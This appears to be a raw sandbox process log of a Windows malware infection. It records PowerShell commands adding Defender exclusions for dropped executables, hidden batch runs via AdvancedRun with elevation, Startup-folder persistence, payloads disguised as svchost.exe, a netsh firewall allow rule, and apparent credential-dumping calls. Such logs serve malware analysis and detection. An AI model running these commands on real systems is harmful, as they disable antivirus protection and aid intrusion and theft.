AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
6928powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
3916powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
7552powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
7076powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
5860powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
4104fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
2224AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
3284powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
2132powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
7396powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
4568powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force
5236powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
8132timeout.exe timeout 1
4680fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
8508fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe"
5808svchost.exe C:\Windows\syswow64\svchost.exe
6852powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
6956powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force
8920powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force
6848timeout.exe timeout 1
6104svchost.exe C:\Windows\syswow64\svchost.exe
6664AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
5496powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
3148powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
236powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
3244powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
2696powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
3868t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe"
2980powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
6288powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe" -Force
2320powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
784timeout.exe timeout 1
7544Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe" -m "C:\Users\test22\AppData\Roaming\ULWTCCYCJS.exe"
1828AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
2324powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
5940powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
5812powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
1396powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
7540powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
4080timeout.exe timeout 1
7812Host.exe "C:\Users\test22\AppData\Roaming\Install\Host.exe"
6452File.exe C:\Users\test22\AppData\Local\Temp\File.exe /stext C:\Users\test22\AppData\Roaming\EWLTMYXOWI
1132File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\LOMWYOHPXP
8384AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
6116powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
2408powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
6684powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
7524powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6584powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
254057w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
4376AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
1276powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6548powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
4832powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
5856powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe" -Force
6208powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
3940timeout.exe timeout 1
506457w10427ebbdUHA4f4f4J20y9.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\57w10427ebbdUHA4f4f4J20y9.exe"
1048powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
5452powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SHSPFVNKVD.exe" -Force
1912powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
8844timeout.exe timeout 1
2608AdvancedRun.exe "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
4920powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
860powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
6044powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
5772powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\svchost.exe" -Force
7156powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe" -Force
2356timeout.exe timeout 1
7256netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
6384File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\BIDXMHYHNV
4408File.exe C:\Users\test22\AppData\Local\Temp\File.exe -f C:\Users\test22\AppData\Roaming\UOOKFMESAY
532